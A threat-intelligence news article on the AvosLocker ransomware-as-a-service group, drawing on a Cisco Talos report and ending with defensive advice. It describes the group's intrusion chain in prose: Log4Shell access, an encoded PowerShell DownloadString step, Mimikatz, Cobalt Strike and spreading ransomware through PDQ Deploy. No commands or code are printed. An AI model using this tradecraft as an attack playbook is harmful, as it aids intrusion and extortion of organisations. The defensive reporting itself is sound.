The Avos ransomware threat actor has recently updated its tooling, not only using malicious software but also commercial products.
A new report from Cisco Talos Intelligence Group exposes new tools used in Avos ransomware attacks.
Who is Avos?
Avos is a ransomware group active since July 2021. The group follows the Ransomware as a Service business model, which means they provide ransomware services to different affiliates (Figure A).
AvosLocker currently supports Windows, Linux and ESXi environments and provides automatic highly configurable builds for the AvosLocker malware. In addition, the threat actor provides a control panel for the affiliates, a negotiation panel with push and sound notifications, decryption tests, and access to a diverse network of penetration testers, initial access brokers and other contacts.
SEE: Password breach: Why pop culture and passwords don’t mix (free PDF) (TechRepublic)
Avos also provides calling services and DDoS attacks, which means they give phone calls to victims to encourage them to pay the ransom or execute DDoS attacks during the negotiation to add stress to the situation.
AvosLocker has already targeted critical infrastructures in the US, such as financial services, manufacturing and government facilities, according to the FBI. The Avos team do not allow attacks against post-Soviet Union countries. A user nicknamed “Avos” has been observed trying to recruit penetration testers with experience in Active Directory networks and initial access brokers on a Russian forum.
In late 2021, the group apologized for one attack aimed at a U.S. police agency and provided an immediate and free decryption for all the data that had been encrypted. An affiliate had already successfully targeted that police agency, probably without realizing it, so the Avos group decided to provide the decryption to the agency.
AvosLocker infections & tools
Spam email campaigns are used as an initial infection vector to gain a foothold in the targeted network before deploying the ransomware.
Other methods may be used for the initial infection. Talos observed a case where the initial compromise was done via an ESXi server exposed on the internet over VMWare Horizon Unified Access Gateways (UAG) and vulnerable to the Log4Shell vulnerability.
Once inside the compromised network, the attackers used several malicious tools on endpoints. They also used LoLBins (Living-off-the-Land Binaries), which are non-malicious binaries already installed on operating systems, such as the WMI Provider Host (wmiprvse.exe).
Four weeks after the initial compromise, the threat actor ran an encoded PowerShell command utilizing DownloadString. In the following days, several PowerShell commands were run to download additional files and tools such as Mimikatz and Cobalt Strike beacons. A port scanner known as the SoftPerfect Network Scanner was also downloaded and used. This port scanner is a commercially available tool, and Avos is known to make frequent use of it. The cybercriminals then modified administrative settings on a local and remote host to help move to the lateral movement stage of the attack.
Another instance of the port scanner was transferred via AnyDesk to another server in the compromised network.
Once all reconnaissance and lateral movements have been completed, the attackers use a legitimate software deployment tool named PDQ Deploy to proliferate the ransomware and other tools across the target network.
In the past, Avos attacks have also revealed the use of other tools: the PuTTY Secure copy client tool (pscp.exe), Rclone, Advanced IP scanner and WinLister.
At the end of the process, victims are shown a ransom note (Figure B).
Avos victims who do not pay have their data sold, as stated on the Avos website: “All data is FOR SALE. Contact us with your offers. We only sell data to third parties if the owner of said data refuses to pay.”
How to protect yourself from Avos
Network segmentation should be implemented to reduce the risk of the whole organization being shut down by ransomware. Strong backup policies also need to be in place to avoid losing data in case of a successful attack.
Multi-factor authentication should be deployed for every service facing the Internet, especially VPN access and webmail systems. Accesses should be configured with the least privileges.
Antivirus and security solutions need to be deployed in order to detect the threat. Real time protection should always be enabled. All systems and software need to be up to date and patched to avoid falling for common vulnerabilities.
Training and awareness should be done for every employee, especially to distinguish phishing emails or any social engineering trick that might target the user.
Disclosure: I work for Trend Micro, but the views expressed in this article are mine.